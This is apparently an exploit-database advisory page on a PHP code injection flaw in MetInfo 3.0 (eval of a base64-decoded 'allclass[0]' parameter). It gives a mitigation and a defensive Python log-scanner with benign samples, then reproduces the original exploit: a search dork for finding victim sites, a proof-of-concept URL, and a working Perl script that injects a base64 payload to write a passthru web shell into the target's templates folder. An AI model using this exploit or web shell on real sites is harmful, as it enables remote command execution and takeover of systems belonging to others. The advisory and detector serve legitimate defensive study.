Vendor: MetInfo
By: linux520.com
CVSS: 9 (HIGH)
CWE: 94 (Code Injection)
Product Name: MetInfo
Affected Version From: 3.0
Affected Version To: 3.0
Patch Exists: YES
Related CWE: N/A
CPE: a:metinfo:metinfo:3.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2010

MetInfo 3.0 PHP Code Injection Vulnerability

MetInfo 3.0 is vulnerable to PHP code injection. The 'common.inc.php' script passes the user-supplied 'allclass[0]' parameter, base64-decoded, to eval() without sanitizing it or checking that the application itself set the variable. An attacker can exploit this by sending a maliciously crafted HTTP request to the vulnerable script, which allows execution of arbitrary code on the vulnerable system.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to execute unintended commands. Additionally, the application should be updated to the latest version.
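
To go with the mitigation above, a log-review check, added here as an example and not part of the original advisory: it flags access-log requests that pass an 'allclass' parameter to 'include/common.inc.php' and base64-decodes the value for triage. The combined log format, the function names and the sample lines are assumptions constructed for illustration; parameters sent in a POST body would not appear in such a log.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
VULN_PATH = "/include/common.inc.php"
PARAM_RE = re.compile(r"^allclass(\[.*\])?$")  # allclass, allclass[0], allclass[]

def decode_payload(value):
    """Best-effort base64 decode of the parameter value, for analyst triage."""
    value = value.replace(" ", "+")            # parse_qsl turns a literal '+' into a space
    value += "=" * (-len(value) % 4)           # tolerate stripped padding
    try:
        return base64.b64decode(value).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None

def scan_line(line):
    """Return a finding if the request feeds an allclass parameter to common.inc.php."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.lower().endswith(VULN_PATH):
        return None
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if PARAM_RE.match(key):
            return {"client": line.split(" ", 1)[0], "status": int(m.group("status")),
                    "param": key, "decoded": decode_payload(value)}
    return None

# Constructed sample log lines (not taken from a real server); the payload is a harmless call.
_benign = base64.b64encode(b"phpinfo();").decode()
SAMPLE_LOG = [
    '192.0.2.10 - - [31/Oct/2010:10:00:00 +0000] "GET /index.php?lang=en HTTP/1.1" 200 5120',
    '192.0.2.44 - - [31/Oct/2010:10:00:05 +0000] "GET /include/common.inc.php?allclass%5B0%5D='
    + _benign.replace("=", "%3D") + ' HTTP/1.1" 200 0',
    '192.0.2.44 - - [31/Oct/2010:10:00:09 +0000] "GET /include/common.inc.php HTTP/1.1" 200 0',
]

def scan(lines):
    return [f for f in map(scan_line, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Any hit deserves review, since a legitimate client has no reason to set this parameter on that script.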

Exploit-DB raw data:

#####################################################################################################
#Exploit Title: MetInfo 3.0 PHP Code Injection Vulnerability
#Date: 2010-10-31
#Author: linux520.com
#Team: http://www.linux520.com/
#Vendor: http://www.metinfo.cn/
#Dork: "Powered by  MetInfo 3.0 "  #    Google: 400,000 + results
#Price: free
#Language: PHP
#Greetz: CCAV
#####################################################################################################
+Description:
At line 67 of ROOTPATH/include/common.inc.php:

eval(base64_decode($allclass[0])); 

$allclass[0] is not defined, so we can inject eval php code
#####################################################################################################
+POC: http://victim.com/include/common.inc.php?allclass[0]=[base64_encode(eval php code)]
#####################################################################################################
+Exploit:

#!/usr/bin/env perl

use LWP::UserAgent;
print "################################################################\n";
print "#              MetInfo 3.0 c0de inj3cti0n 3xplo!t              #\n";
print "#                         by:linux520.com                      #\n";
print "################################################################\n";

die "Usage: $0 <target site> Ex:$0 victim.com\n" unless($ARGV[0]);
my $victim = $ARGV[0];
$user_agent = new LWP::UserAgent;
$vul_request = new HTTP::Request('GET',"http://$victim/include/common.inc.php?allclass[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw/cGhwIHBhc3N0aHJ1KCRfR0VUW2NtZF0pPz4nKTs=");
# fputs(fopen('../templates/test.php','w+'),'<?php passthru($_GET[cmd]);?>');
$user_agent->request($vul_request);
$response = $user_agent->request(new HTTP::Request('GET',"http://$victim/templates/test.php"));
if($response->is_success)
{
	print "code injection successful ! plz look at http://$victim/templates/test.php?cmd=id";
}
else
{
	print "could not connect to $victim";
}
#####################################################################################################